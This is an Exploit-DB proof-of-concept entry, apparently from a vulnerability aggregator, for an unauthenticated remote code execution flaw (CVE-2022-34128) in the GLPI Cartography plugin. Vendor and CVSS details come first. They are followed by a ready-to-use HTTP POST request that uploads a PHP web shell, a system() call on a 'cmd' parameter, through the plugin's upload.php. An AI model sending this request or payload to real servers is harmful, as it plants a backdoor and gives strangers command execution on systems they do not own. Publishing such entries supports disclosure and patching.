GLPI Cartography Plugin v6.0.0 - Unauthenticated Remote Code Execution (RCE)

2023-04-0300:00:00

Nuri Çilengir

www.exploit-db.com

149

remote code execution

glpi cartography

unauthenticated

cve-2022-34128

ubuntu 22.04

sql injection

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.8

Confidence

High

EPSS

0.024

Percentile

89.9%

JSON

# Exploit Title: GLPI  Cartography Plugin v6.0.0 - Unauthenticated Remote Code Execution (RCE)
# Date of found: 11 Jun 2022
# Application: GLPI Cartography < 6.0.0
# Author: Nuri Çilengir 
# Vendor Homepage: https://glpi-project.org/
# Software Link: https://github.com/InfotelGLPI/positions
# Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/
# Tested on: Ubuntu 22.04
# CVE: CVE-2022-34128

# PoC
POST /marketplace/positions/front/upload.php?name=poc.php HTTP/1.1
Host: 192.168.56.113
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Length: 39
Origin: http://192.168.56.113
Connection: close

<?php echo system($_GET["cmd"]); ?>